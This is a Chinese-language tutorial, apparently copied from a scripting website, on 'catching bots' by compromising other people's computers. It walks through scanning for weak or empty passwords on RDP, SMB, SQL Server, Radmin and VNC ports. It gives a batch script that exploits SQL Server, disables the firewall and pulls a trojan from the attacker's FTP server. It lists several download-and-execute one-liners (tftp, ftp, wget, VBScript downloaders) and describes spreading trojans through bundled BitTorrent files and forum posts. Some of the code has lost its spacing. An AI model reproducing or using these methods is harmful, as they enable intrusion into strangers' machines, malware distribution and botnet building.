?
1、3389 抓鸡
现在国内网络上流传着一种克隆版的?XP,安装后会默认开启一个账号为?new,密码为空的?账户,而且基本上都是开着?3389 的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工?具扫一段?IP?的?3389 端口,扫完后就直接用远程桌面连接开放?3389 的机器(也可以把结?果保存为文本文件,用批量生成?3389 连接的工具来连接),然后输入账号?new?登入,如?果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~
这种方法只针?XP?系统,如果遇到?2000 或者?2003 系统就不要试了
呵呵。缺点也很明显,如果别人不是用?new?账号登入?XP?的,你再登入上去就会把他挤出?去(XP?只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开?IE?下载木马了。
2、扫?135 端口抓肉鸡
首先先用端口扫描器扫一段?IP?的?135 端口,然后把结果保存,再用?NTSCAN?过滤有弱口?令的机器,最后用?recton?开?telnet?传马。因为现在?135 和?445 端口都被防火墙屏蔽了,?只能扫本地的?135 肉鸡,要抓外地的只能用外地的?135 肉鸡来扫。(详细动画
可以去黑客网站搜索?135)
3、扫?445 端口抓肉鸡
和扫?135 抓肉鸡差不多,首先先用端口扫描器扫一段?IP?的?445 端口,然后把结果保存,?再用?NTSCAN?过滤有弱口令的机器,最后用啊?D 工具包开共享传马。因为现在?135 和?445 ?端口都被防火墙屏蔽了,只能扫本地的?445 肉鸡,要抓外地的只能用外地的?445 肉鸡来扫。?(详细动画可以去黑客网站搜索?445)
4、1433 端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。要用到的工具:S?扫?sqlhello.exenc.exe?批处理文件首先先写个批处理,打开记事本,把以下代码复制修改?后,储存为扫描+溢出.bat?文件
@echooff
for/f"eol=;tokens=?1,2delims="%%iin(tt.txt)dos.exetcp%%i%%j
脚本之家 www.jb51.net
?
14331000/save
@echooff
for/f"eol=;tokens=?1delims="%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556
还要新建一个?tt.txt,里面你要扫的?IP?段,格式为
XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格
1433 是要扫描的端口,1000 是扫描线程数,dosqlhello%%i
1433xxx.xxx.xx.xx556 这个里的?XXX?添你的?IP?,556 是后面?NC?监
听的端口然后再写个批处理
@echooff
Nc-l-vv-p556>daima.txt
echousername>>daima.txt
echopassword?>>daima.txt
echo?bin>>daima.txt(以?2 进制传输数据)
echogetxxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
echo?bye>>daima.txt
netstopsharedaccess(关闭?WINDOWS?自带防火墙)
ftp-s:daima.txt
xxx.exe(也是填你木马的文件名)
deldaima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。
几种肉鸡上传文件的方法
tftp?法
先在自己某机器上建个?tftp?服务器,如执行?tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡?cmd?中执行:tftp-i 服务器?ipgetsample.exe
ftp?法
肉鸡?cmd?中执行:
echoopenftp?服务器?ip[端口]>ftp.txt
echousername>>ftp.txt
echopassword?>>ftp.txt
echogetsample.exe>>ftp.txt
echo?bye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
工具法
利用?wineggdrop?的?wget.exe
肉鸡?cmd?中执行:wget?网站/sample.exe
利用?dl.v?be 法
肉鸡?cmd?中执行:
echowithwscript:if.arguments.count^<2then.quit:endif
>dl.v?be
echosetaso=.createobject("adodb.stream")?:set
web=createobject("microsoft.xmlhttp")?>>dl.v?be
?
脚本之家 www.jb51.net
?
echoweb.open"get",.arguments(0),0:web.send?:if
web.status^>200thenquit>>dl.v?be
echo
aso.type=?1:aso.open:aso.writeweb.responsebody:aso.savetofile 
.arguments(?1),2:endwith?>dl.v?be
cscriptdl.v?be?http://*。*。*。*:88/sample.exesample.exe
利用?iget.v?be 法
方法同?4,
肉鸡?cmd?中执行:
echo?i?Local=LCase(WScript.Arguments(?1))>iget.v?be
echo?i?Remote=LCase(WScript.Arguments(0))>>iget.v?be
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>>iget.v?be
echoxPost.Open"GET",iRemote,0>>iget.v?be
echoxPost.Send()>>iget.v?be
echoSetsGet=CreateObject("ADODB.Stream")?>>iget.v?be
echosGet.Mode=3>>iget.v?be
echosGet.Type=1>>iget.v?be
echosGet.Open()>>iget.v?be
echosGet.Write(xPost.responseBody)?>>iget.v?be
echosGet.SaveToFile?i?Local,2>>iget.v?be
cscriptiget.v?be?http://*。*?。*。*/sample.exesample.exe
利用?Http 网站?v?be 法
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.v?be
echoxPost.Open"GET","http://*.*.*.*/sample.exe",0
>>dsa.v?be
echoxPost.Send()>>dsa.v?be
echoSetsGet=CreateObject("ADODB.Stream")?>>dsa.v?be
echosGet.Mode=3>>dsa.v?be
echosGet.Type=1>>dsa.v?be
echosGet.Open()>>dsa.v?be
echosGet.Write(xPost.responseBody)?>>dsa.v?be
echosGet.SaveToFile"sample?.exe",2>>dsa.v?becscript
dsa.v?be
de?ldsa.v?be
3389?法
可以开?3389?,然后登陆,进行本地的下载。该方法对服务
器上传很严格的机器特有效。(包括硬件防火墙)
先打开多个?NC.bat,然后再打开扫描+溢出.bat,然后你就可以
去睡大觉了。?自动扫描,扫描完后自动溢出,溢出后还自动下
马执行,爽吧!所以这里讲详细点,呵呵。还有?4221 端口也
可以这样溢出,只要用这些端口的溢出工具就好了,详细动画
可以去黑客网站搜索?1433。
?
脚本之家 www.jb51.net
?
忘了说,上面的工具和批处理什么的都要放在同一个文件
夹下。
先休息一下,打这么多字累死了
继续
5、扫?1433 抓肉鸡之方法?2
要用到的工具:端口扫描器?X-scanSQL?综合利用工具
上面我们说过了,1433 溢出现在成功率已经不高了,所以我
们可以用另一种方法。开了?1433 端口的机器一般都装了?SQL,
所以我们可以猜测?SQL?弱口令来抓?1433 肉鸡。
首先先用端口扫描器扫一段?IP?的?1433 端口,然后结果保存为
文本文件,接着用?X-scan?导入这些开了?1433 的?IP,然后在扫描
参数-全局设置-扫描模块这一栏里只勾上?SQL-SERVER?就可以了
,?其他不要勾。然后在插件设置-端口相关设置-待检测端口这
一栏,只填?1433 端口。然后就可以开始扫描了。扫描完成后会
有个报告,列出了有弱口令的机器,然后打开?SQL?综合利用工
具,输入你扫到的弱口令来连接,接着打开?SQL?综合利用工具-
利用目录,上传你的木马,然后在用?DOS?命令执行你的木马就
OK?了。
6、用?WINNTAutoAttack?扫?SA?弱口令抓肉鸡
其实这个原理和上面一样,效率也没上面的高,只是想让大
家知道下,呵呵。
工具:WINNTAutoAttackSQL?综合利用工具
打开?WINNTAutoAttack,找一段?IP?添上,然后只勾上设置下
的仅对?PING?检查成功的机器进行检测和?SQL?列出密码为空的?SA
账号,接着开始扫描,扫完后,用?SQL?综合利用工具连上传马
执行就好了。
7、扫?4899 空口令抓肉鸡
工具:端口扫描器?4899 探测器?Radmin
首先先用端口扫描器扫一段?IP?的?4899 端口,然后用?4899 探测
器导入开了?4899 端口的?IP,接着扫空令,最后用?Radmin?连接有
空口令的机器,带开文件管理,上传的你木马运行就?OK?了。
详细动画可以去黑客网站搜索?4899
8、扫?5900 端口抓?VNC?肉鸡抓肉鸡
工具:VNC?扫描器?VNC?连接器
首先用?VNC?扫描器扫描一段?IP,扫描格式为?vscan.exe(扫描
器文件名)-i219.0.0.0-219.255.255.255(扫描?IP?段)-p5900-
vnc-vv?扫描完成后会在扫描器所在的同一文件夹生成一个文
本文件,打开后有一列?IP,IP?后面的有一些单词比如
patched,banned,vulnerable,只有单词为?vulnerable?才能连接。接着?就用?VNC?连接器连接,下面就不用多说了吧?详细动画可以去
黑客网站搜索?VNC
接下来说说挂马抓肉鸡吧。方法有很多,比如?BT?挂马、免费
空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介
绍几种我会的。
?
脚本之家 www.jb51.net
?
1、BT?挂马
顾名思义,就是把你的木马发布到?BT?网站让人下载。当然如果只把单纯的木马文件发布上 去效果肯定不好,而且现在一般的?BT?网站也不让发布?EXE?文件。所以我们需要一些隐藏 的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成?RAR??文件发布,谁在开始下载时会知道?RAR?里有木马呢?当他费了好大劲下载完,打开发现是 EXE?的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下?XXX?片 的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是 所有文件都可以这样的,我只知道?RM?和?EXE?文件可以插入),别人下载打开后同时也会带 开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马 了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如?RM?捆绑木 马后保持?RM?格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何 不说把木马和?BT?种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,?木马和其他文件捆绑后生成的文件只能为?EXE?格式的,除非你有你所捆绑文件的格式的溢 出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在 ?很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一 个最近的?RAR?溢出漏洞,针对?winrar3.6 版本以下的所有版本,只要你?winrar?版本低于 3.6,运行绑了牧马的?RAR?文件后就会中马。此类木马症状为:运行?RAR?文件后会弹出一 个什么什么损坏还是错误的对话框,然后?RAR?文件体积变小,减少的体积就为木马的体积。?然后再次打开这个?RAR?文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新 下?WINRAR?版本,小心中马哈。
2、免费空间挂马
其实和?BT?差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的?帖子让别人下载你的木马。优点是不用像?BT?那样做种子,那样不仅要开着电脑,还影响网?速。我这几天就是这样挂的,弄个免费空间,上传个木马,到?2?个?XXX?论坛发个帖子,每?天睡前一顶。 ??www.hookbase.com?上面有好多可以学的,不清楚的问下我
?
